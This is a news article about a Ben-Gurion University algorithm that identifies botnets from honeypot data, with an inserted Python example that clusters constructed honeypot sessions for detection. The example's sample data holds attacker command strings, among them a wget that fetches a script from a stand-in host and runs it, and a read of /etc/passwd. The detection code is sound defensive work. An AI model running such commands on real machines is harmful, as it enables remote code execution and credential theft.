Algorithm developed to predict future botnet attacks

Six botnets have been discovered and traced back to their operators by an algorithm produced by researchers at Israel’s Ben-Gurion University (BGU) of the Negev. The scientists who built the algorithm say it will allow law enforcement to trace the administrators responsible for future attacks.

The key to the work is analysing data produced by previous attacks, the cybersecurity researchers say.

Malicious botnets are groups of Internet-connected computers that have been secretly compromised and placed under the remote control of an operator. They are used to relay spam, distribute malware and launch attacks against other systems, and the infected PCs can also be made to hand over the private information stored on them.

Spam and viruses

While an infection can often be detected on the compromised machine itself, the infrastructure controlling the botnet has been difficult to trace, the researchers say.

“Using botnets, hackers and cybercriminals can carry out powerful attacks that, until now, were largely untraceable,” an article on the university’s website says.

The new algorithm first identifies the botnet and then allows it to be traced, according to the scientists at Deutsche Telekom Innovation Labs at BGU.

How they did it

The team had access to a wealth of honeypot data collected by one of the largest telcos in the world, Deutsche Telekom.

Through machine learning and analysis of that honeypot data, “they built a breakthrough program that identifies the botnet by finding similar attack patterns,” BGU claims.

A honeypot is a deliberately exposed system that baits the botnet into attacking it so that its behaviour can be recorded and intelligence collected about it. It was that data the team had access to. Once you’ve identified the botnet and its source, you can go after the administrators, the scientists think.

Six botnets

The team reckons they found six botnets. But not only that, they think that they can now tell whether an attack came from a human operator or from an automated bot.
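The article describes the approach only in outline: machine learning over honeypot records that groups attacking hosts by similar attack patterns, plus a way of telling human operators from automated bots. The following is an added illustration of that general idea, not the BGU/Deutsche Telekom algorithm and not code from the article. The honeypot sessions are constructed for the example (SSH-style records of login attempts, credentials tried and commands run), and the feature choice (Jaccard similarity of credential lists and command sets, union-find clustering, inter-arrival timing regularity for the human-versus-bot call) and the thresholds are assumptions chosen for the demonstration.

```python
"""Group honeypot sessions into candidate botnets by attack-pattern similarity,
then flag each source as scripted or human from its timing.

Constructed illustration only: not the BGU/Deutsche Telekom method, and the
session records below are made up for the example.
"""
from collections import defaultdict
from itertools import combinations
from statistics import mean, pstdev

# Constructed SSH-honeypot sessions: source IP, timestamps (seconds) of each
# login attempt, credential pairs tried, and commands run after login.
SESSIONS = [
    {"src": "198.51.100.10", "t": [0.0, 2.0, 4.0, 6.0, 8.0],
     "creds": {"root:root", "root:123456", "admin:admin", "pi:raspberry"},
     "cmds": ["uname -a", "cat /proc/cpuinfo", "wget http://example.invalid/x.sh", "sh x.sh"]},
    {"src": "198.51.100.11", "t": [0.0, 2.1, 4.0, 6.1, 8.0],
     "creds": {"root:root", "root:123456", "admin:admin", "pi:raspberry"},
     "cmds": ["uname -a", "cat /proc/cpuinfo", "wget http://example.invalid/x.sh", "sh x.sh"]},
    {"src": "203.0.113.5", "t": [0.0, 1.0, 2.0, 3.0],
     "creds": {"root:toor", "ubnt:ubnt", "support:support"},
     "cmds": ["/bin/busybox ECCHI", "cat /proc/mounts"]},
    {"src": "203.0.113.6", "t": [0.0, 1.0, 2.0, 3.0],
     "creds": {"root:toor", "ubnt:ubnt", "support:support"},
     "cmds": ["/bin/busybox ECCHI", "cat /proc/mounts"]},
    {"src": "192.0.2.77", "t": [0.0, 7.3, 31.0, 44.8, 120.5],
     "creds": {"root:password"},
     "cmds": ["ls -la", "cat /etc/passwd", "whoami", "history"]},
]


def jaccard(a, b):
    """Set overlap in [0, 1]; 0 when both sets are empty."""
    a, b = set(a), set(b)
    return len(a & b) / len(a | b) if (a | b) else 0.0


def pattern_similarity(s1, s2):
    """Credentials tried and commands issued both fingerprint the attacker's tooling;
    weight them equally (an assumption for this example)."""
    return 0.5 * jaccard(s1["creds"], s2["creds"]) + 0.5 * jaccard(s1["cmds"], s2["cmds"])


def cluster_sessions(sessions, threshold=0.6):
    """Union-find over all pairs whose similarity meets the threshold.
    Returns clusters as sorted lists of source IPs, ordered by first member."""
    parent = list(range(len(sessions)))

    def find(i):
        while parent[i] != i:
            parent[i] = parent[parent[i]]  # path halving
            i = parent[i]
        return i

    for i, j in combinations(range(len(sessions)), 2):
        if pattern_similarity(sessions[i], sessions[j]) >= threshold:
            parent[find(i)] = find(j)

    groups = defaultdict(list)
    for i, s in enumerate(sessions):
        groups[find(i)].append(s["src"])
    return sorted((sorted(g) for g in groups.values()), key=lambda g: g[0])


def is_automated(session, max_cv=0.25):
    """Scripted attackers retry on a fixed cadence; humans do not. Flag a source as
    automated when the coefficient of variation of its inter-attempt gaps is small.
    Returns None when there is too little timing data to judge."""
    t = session["t"]
    gaps = [b - a for a, b in zip(t, t[1:])]
    if len(gaps) < 2:
        return None
    avg = mean(gaps)
    if avg == 0:
        return True  # everything arrived in one burst: not a person typing
    return pstdev(gaps) / avg <= max_cv


def report(sessions):
    return {
        "clusters": cluster_sessions(sessions),
        "automated": {s["src"]: is_automated(s) for s in sessions},
    }


if __name__ == "__main__":
    for line in report(SESSIONS).items():
        print(*line)
```

On the constructed data the two pairs of hosts that share a credential list and a post-login command sequence each fall into one cluster (a candidate botnet), the lone host that tries a single password and browses around by hand stays a singleton, and only that host fails the timing-regularity test. A real deployment would use far richer features (payload hashes, download URLs, TLS fingerprints) and proper clustering, but the shape of the problem is the same.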

And they say that they can “predict future attacks,” BGU says.

“This is the first time such a comprehensive study has been carried out and returned with unique findings,” Dudu Mimran, CTO of Deutsche Telekom Innovation Labs at BGU, said in the article.

The team made their announcement at Israel Defence’s CyberTech 2016 event. Incidentally, it was the same event where Israeli Prime Minister Benjamin Netanyahu expressed an interest in the country strengthening its global role in cybersecurity.

How many?

Possibly half a billion computers around the world have been infected by botnets, the Deutsche Telekom Innovation Labs website estimates. Botnets also cost the world’s economy $100 billion (€89 billion) a year, the lab says.

But, generally, detecting the server that controls the botnet is “next to impossible,” the Times of Israel says in an article about the BGU algorithm.

How are they hiding?

Spoofed IP addresses and fabricated domain names are among the methods the attackers use to mask the location of their control servers, the online newspaper explains.

“While computer security experts have had some success tracking down the controllers of the botnets, there are probably dozens that remain ‘in the wild’ for each one taken down,” says the story.

“The annoying ‘zombie armies of the Internet’ may have met their match,” the article suggests.

IDG News Service